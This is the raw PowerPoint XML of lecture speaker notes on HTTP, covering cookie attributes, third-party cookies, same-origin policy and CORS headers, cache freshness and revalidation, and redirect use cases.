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306" r:id="rId3"/>
    <p:sldId id="277" r:id="rId4"/>
    <p:sldId id="278" r:id="rId5"/>
    <p:sldId id="265" r:id="rId6"/>
    <p:sldId id="266" r:id="rId7"/>
    <p:sldId id="267" r:id="rId8"/>
    <p:sldId id="268" r:id="rId9"/>
    <p:sldId id="270" r:id="rId10"/>
    <p:sldId id="272" r:id="rId11"/>
    <p:sldId id="273" r:id="rId12"/>
    <p:sldId id="274" r:id="rId13"/>
    <p:sldId id="285" r:id="rId14"/>
    <p:sldId id="287" r:id="rId15"/>
    <p:sldId id="289" r:id="rId16"/>
    <p:sldId id="290" r:id="rId17"/>
    <p:sldId id="292" r:id="rId18"/>
    <p:sldId id="294" r:id="rId19"/>
    <p:sldId id="296" r:id="rId20"/>
    <p:sldId id="297" r:id="rId21"/>
    <p:sldId id="298" r:id="rId22"/>
    <p:sldId id="301" r:id="rId23"/>
    <p:sldId id="302" r:id="rId24"/>
    <p:sldId id="303" r:id="rId25"/>
    <p:sldId id="26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8D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39" autoAdjust="0"/>
    <p:restoredTop sz="66095" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="76" d="100"/>
          <a:sy n="76" d="100"/>
        </p:scale>
        <p:origin x="-264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1FBA53-7C6F-4BC8-8449-397E8BAE2CEC}" type="datetimeFigureOut">
              <a:rPr lang="en-NZ" smtClean="0"/>
              <a:t>10/04/2017</a:t>
            </a:fld>
            <a:endParaRPr lang="en-NZ"/>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140335-6261-4D17-B74F-AB4A9A01B6E2}" type="slidenum">
              <a:rPr lang="en-NZ" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-NZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="376224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eveloper.mozilla.org/en-US/docs/Web/HTTP/Headers/Origin"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developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Access-Control-Allow-Origin"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36140335-6261-4D17-B74F-AB4A9A01B6E2}" type="slidenum">
              <a:rPr lang="en-NZ" smtClean="0"/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="en-NZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="608994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Cookies that are available to JavaScript might get stolen through XSS.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> specifies those hosts to which the cookie will be sent. If not specified, defaults to the host portion of the current document location (but not including subdomains). If a domain is specified, subdomains are always included.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> indicates a URL path that must exist in the requested resource before sending the Cookie header.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cookies have a domain associated to them. If this domain is the same as the domain of the page you are on, the cookies is said to be a first-party cookie. If the domain is different, it is said to be a third-party cookie. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>While first-party cookies are sent only to the server setting them, a web page may contain images or other components stored on servers in other domains (like ad banners). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cookies that are sent through these third-party components are called third-party cookies and are mainly used for advertising and tracking across the web. See for example the types of cookies used by Google. Most browsers allow third-party cookies by default, but there are add-ons available to block them (for example, Privacy Badger by the EFF).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{36140335-6261-4D17-B74F-AB4A9A01B6E2}" type="slidenum">
              <a:rPr lang="en-NZ" smtClean="0"/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-NZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="693537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err="1" smtClean="0"/>
              <a:t>XMLHttpRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> and Fetch follow the same-origin policy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{36140335-6261-4D17-B74F-AB4A9A01B6E2}" type="slidenum">
              <a:rPr lang="en-NZ" smtClean="0"/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-NZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="563264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Lines 1 - 10 are headers sent. Note that the main HTTP request header of note here is the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId3" tooltip="The Origin request header indicates where a fetch originates from. It doesn't include any path information, but only the server name. It is sent with CORS requests, as well as with POST requests. It is similar to the Referer header, but, unlike this header, it doesn't disclose the whole path."/>
              </a:rPr>
              <a:t>Origin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> header on line 10 above, which shows that the invocation is coming from content on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> domain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>http://foo.example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-NZ"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Lines 13 - 22 show the HTTP response from the server on domain http://bar.other. In response, the server sends back an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId4" tooltip="The Access-Control-Allow-Origin response header indicates whether the response can be shared with resources with the given origin."/>
              </a:rPr>
              <a:t>Access-Control-Allow-Origin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> header, shown above in line 16. The use of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId3" tooltip="The Origin request header indicates where a fetch originates from. It doesn't include any path information, but only the server name. It is sent with CORS requests, as well as with POST requests. It is similar to the Referer header, but, unlike this header, it doesn't disclose the whole path."/>
              </a:rPr>
              <a:t>Origin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> header and of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId4" tooltip="The Access-Control-Allow-Origin response header indicates whether the response can be shared with resources with the given origin."/>
              </a:rPr>
              <a:t>Access-Control-Allow-Origin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> show the access control protocol in its simplest use. In this case, the server responds with a Access-Control-Allow-Origin: * which means that the resource can be accessed by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>any</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> domain in a cross-site manner. If the resource owners at http://bar.other wished to restrict access to the resource to be only from http://foo.example, they would send back:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Access-Control-Allow-Origin: http://foo.example</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-NZ" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Note that now, no domain other than </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>http://foo.example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> (identified by the ORIGIN: header in the request, as in line 10 above) can access the resource  in a cross-site manner.  The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Access-Control-Allow-Origin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> header should contain the value that was sent in the request's </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Origin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> header. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{36140335-6261-4D17-B74F-AB4A9A01B6E2}" type="slidenum">
              <a:rPr lang="en-NZ" smtClean="0"/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-NZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3706941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Credentialed requests and wildcards</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>When responding to a credentialed request, the server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>must</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> specify an origin in the value of the Access-Control-Allow-Origin header, instead of specifying the "*" wildcard.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Because the request headers in the above example include a Cookie header, the request would fail if the value of the Access-Control-Allow-Origin header were "*". But it does not fail: Because the value of the Access-Control-Allow-Origin header is "http://foo.example" (an actual origin) rather than the "*" wildcard, the credential-cognizant content is returned to the invoking web content.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Note that the Set-Cookie response header in the example above also sets a further cookie.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{36140335-6261-4D17-B74F-AB4A9A01B6E2}" type="slidenum">
              <a:rPr lang="en-NZ" smtClean="0"/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-NZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1781138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freshness lifetime is calculated based on several headers. If a "Cache-control: max-age=N" header is specified, then the freshness lifetime is equal to N. If this header is not present, which is very often the case, it is checked if an Expires header is present. If an Expires header exists, then its value minus the value of the Date header determines the freshness lifetime. Finally, if neither header is present, look for a Last-Modified header. If this header is present, then the cache's freshness lifetime is equal to the value of the Date header minus the value of the Last-modified header divided by 10.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The expiration time is computed as follows:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>expirationTime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>responseTime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>freshnessLifetime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>currentAge</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-NZ" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>responseTime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> is the time at which the response was received according to the browser.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-NZ" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-NZ" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Eviction algorithms often privileges fresh resources over stale resources. Note that a stale resource is not evicted or ignored;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>When the cache receives a request for a stale resource, it forwards this requests with a If-None-Match to check if it isn't in fact still fresh. If so, the server returns a 304 (Not Modified) header without sending the body of the requested resource, saving some bandwidth.</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6140335-6261-4D17-B74F-AB4A9A01B6E2}" type="slidenum">
              <a:rPr lang="en-NZ" smtClean="0"/>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-NZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4137557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Revalidation is triggered when the user presses the reload button.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> It is also triggered under normal browsing if the cached response includes the "Cache-control: must-revalidate" header.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Another factor is the cache validation preferences in the browser preferences panel. There is an option to force a validation each time a document is loaded.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>When a cached document's expiration time has been reached, it is either validated or fetched again. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Validation can only occur if the server provided either a strong validator or a weak validator.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{36140335-6261-4D17-B74F-AB4A9A01B6E2}" type="slidenum">
              <a:rPr lang="en-NZ" smtClean="0"/>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-NZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="295622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Redirects use cases</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-NZ" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-NZ" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Domain aliasing: Ideally, there is one location, and therefore one URL, for one resource. But there are reasons for wanting to have alternative names for a resource and in which it is useful to use a redirect to the one true (canonical) URL.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Expanding the reach of your site. A common case is when your site resides under the www.example.com domain and accessing your pages from example.com should be possible, too. You might also provide commonly used synonym names, or frequent typos of your domain names.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Moving to a different domain. For example, your company has been renamed and you when searching for the old name, you want people used to the old company Web site still find you under the new name.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Forcing HTTPS. Request to the HTTP version of your site will be redirected to the HTTPS version of your site.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Keeping links alive: When you restructure Web sites, URLs of resources change. Even if you can update the internal links of your Web site to match the new naming scheme, you have no control over the URLs used by external resources. You don't want to break this link as they bring you valuable users (and help your SEO), so you set up redirects from the old URLs to the new ones.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Temporary responses to unsafe requests: Unsafe requests modify the state of the server and the user shouldn't to replay them inadvertently. Typically, you don't want your users to resent PUT, POST or DELETE requests. If you just serve the response as the result of this request, a simple press of the reload button will (possibly after a confirmation message), resend the request. In this case, the server can send back a 303 (See Other) request that will contain the right information, but if the reload button is pressed, only this page is redisplayed, without replaying the unsafe requests.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Temporary responses for long requests: Some requests may need more time on the server, like sometimes DELETE requests that are scheduled for later processing. In this of case, the response is a 303 (See Other) redirect that links to a page indicating that the action has been scheduled, and eventually informs about the progress, or allows to cancel it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{36140335-6261-4D17-B74F-AB4A9A01B6E2}" type="slidenum">
              <a:rPr lang="en-NZ" smtClean="0"/>
              <a:t>23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-NZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1544655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three possibilities for URL redirections, several methods can be specified at the same time, but which one is applied first? The order of precedence is the following:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="731520" lvl="1" indent="-457200">
